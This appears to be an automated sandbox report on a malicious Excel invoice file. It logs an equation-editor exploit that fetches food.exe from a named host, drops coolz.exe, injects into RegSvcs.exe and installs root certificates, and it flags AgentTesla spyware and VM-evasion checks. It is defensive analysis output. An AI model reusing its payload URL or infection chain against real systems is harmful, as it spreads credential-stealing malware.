Source: EQNEDT32.EXE, 00000002.00000002.473317377.00000000005D4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.473013254.00000000005CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: EQNEDT32.EXE, 00000002.00000002.473317377.00000000005D4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.473013254.00000000005CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: EQNEDT32.EXE, 00000002.00000002.473317377.00000000005D4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.473013254.00000000005CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: EQNEDT32.EXE, 00000002.00000002.473317377.00000000005D4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.473013254.00000000005CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: EQNEDT32.EXE, 00000002.00000002.473317377.00000000005D4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.473013254.00000000005CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: EQNEDT32.EXE, 00000002.00000002.473317377.00000000005D4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.473013254.00000000005CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: EQNEDT32.EXE, 00000002.00000002.473317377.00000000005D4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.473013254.00000000005CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: EQNEDT32.EXE, 00000002.00000002.473317377.00000000005D4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.473013254.00000000005CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0%
Source: EQNEDT32.EXE, 00000002.00000002.473317377.00000000005D4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.473013254.00000000005CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0-
Source: EQNEDT32.EXE, 00000002.00000002.473317377.00000000005D4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.473013254.00000000005CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0/
Source: EQNEDT32.EXE, 00000002.00000002.473317377.00000000005D4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.473013254.00000000005CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com05
Source: EQNEDT32.EXE, 00000002.00000002.473317377.00000000005D4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.473013254.00000000005CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.entrust.net03
Source: EQNEDT32.EXE, 00000002.00000002.473317377.00000000005D4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.473013254.00000000005CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.entrust.net0D
Source: EQNEDT32.EXE, 00000002.00000002.473317377.00000000005D4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.473013254.00000000005CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: EQNEDT32.EXE, 00000002.00000002.473317377.00000000005D4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.473013254.00000000005CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: EQNEDT32.EXE, 00000002.00000003.473039070.000000000058E000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.473291356.000000000058E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://menyos.com//m/
Source: EQNEDT32.EXE, 00000002.00000003.473039070.000000000058E000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.473291356.000000000058E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://menyos.com/5m/
Source: EQNEDT32.EXE, 00000002.00000003.473039070.000000000058E000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.473291356.000000000058E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://menyos.com/assets/home/js/bdg/food.exe
Source: EQNEDT32.EXE, 00000002.00000003.473039070.000000000058E000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.473291356.000000000058E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://menyos.com/assets/home/js/bdg/food.exeC:
Source: EQNEDT32.EXE, 00000002.00000002.473266370.000000000054F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://menyos.com/assets/home/js/bdg/food.exefj
Source: EQNEDT32.EXE, 00000002.00000002.473266370.000000000054F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://menyos.com/assets/home/js/bdg/food.exeiiC:
Source: EQNEDT32.EXE, 00000002.00000002.473765662.0000000003670000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://menyos.com/assets/home/js/bdg/food.exej
Source: EQNEDT32.EXE, 00000002.00000002.473266370.000000000054F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://menyos.com/assets/home/js/bdg/food.exeuj
Source: EQNEDT32.EXE, 00000002.00000002.473317377.00000000005D4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.473013254.00000000005CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://secure.comodo.com/CPS0

Source: unknown	Network traffic detected: HTTP traffic on port 49163 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49163

Source: unknown

HTTPS traffic detected: 104.21.35.109:443 -> 192.168.2.22:49163 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: sheet1.xml, type: SAMPLE

Matched rule: detects AutoLoad documents using LegacyDrawing Author: ditekSHen

Office equation editor drops PE file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\food[1].exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Temp\coolz.exe			Jump to dropped file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Memory allocated: 770B0000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\coolz.exe	Memory allocated: 770B0000 page execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Memory allocated: 770B0000 page execute and read and write	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_00263BA0	6_2_00263BA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_00268C30	6_2_00268C30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0026F488	6_2_0026F488
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0026BFA8	6_2_0026BFA8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_002647B8	6_2_002647B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_00263EE8	6_2_00263EE8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_00462150	6_2_00462150
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_00466F20	6_2_00466F20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_00469928	6_2_00469928

Source: Fatura 002.xlam.xlsx

OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false

Source: sheet1.xml, type: SAMPLE

Matched rule: INDICATOR_XML_LegacyDrawing_AutoLoad_Document author = ditekSHen, description = detects AutoLoad documents using LegacyDrawing

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winXLSX@6/5@1/1

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\~$Fatura 002.xlam.xlsx

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Mutant created: NULL

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVR87F3.tmp

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: Fatura 002.xlam.xlsx	Virustotal: Detection: 50%
Source: Fatura 002.xlam.xlsx	ReversingLabs: Detection: 71%

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Local\Temp\coolz.exe C:\Users\user\AppData\Local\Temp\coolz.exe
Source: C:\Users\user\AppData\Local\Temp\coolz.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Users\user\AppData\Local\Temp\coolz.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Local\Temp\coolz.exe C:\Users\user\AppData\Local\Temp\coolz.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\coolz.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Users\user\AppData\Local\Temp\coolz.exe	Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: msi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: version.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: secur32.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: webio.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: credssp.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\coolz.exe	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\coolz.exe	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\coolz.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\coolz.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\coolz.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\coolz.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\coolz.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\coolz.exe	Section loaded: dwmapi.dll	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:

Source: Fatura 002.xlam.xlsx

Initial sample: OLE indicators vbamacros = False

Source: food[1].exe.2.dr	Static PE information: real checksum: 0xa2135 should be: 0x120c6d
Source: coolz.exe.2.dr	Static PE information: real checksum: 0xa2135 should be: 0x120c6d

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 6_2_00267988 push esp; ret

6_2_00267995

Persistence and Installation Behavior

Installs new ROOT certificates

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C Blob	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C Blob	Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\food[1].exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Temp\coolz.exe			Jump to dropped file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\coolz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\coolz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\coolz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\AppData\Local\Temp\coolz.exe

API/Special instruction interceptor: Address: 362D6CC

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3544

Thread sleep time: -360000s >= -30000s

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

API call chain: ExitProcess graph end node

graph_2-481

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Code function: 2_2_03670754 mov edx, dword ptr fs:[00000030h]

2_2_03670754

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Maps a DLL or memory area into another process

Source: C:\Users\user\AppData\Local\Temp\coolz.exe

Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and write

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\AppData\Local\Temp\coolz.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 7EFDE008

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Local\Temp\coolz.exe C:\Users\user\AppData\Local\Temp\coolz.exe			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\coolz.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Users\user\AppData\Local\Temp\coolz.exe			Jump to behavior

Source: coolz.exe, 00000005.00000000.472546872.0000000000482000.00000002.00000001.01000000.00000004.sdmp, food[1].exe.2.dr, coolz.exe.2.dr

Binary or memory string: @3PDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected AgentTesla

Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
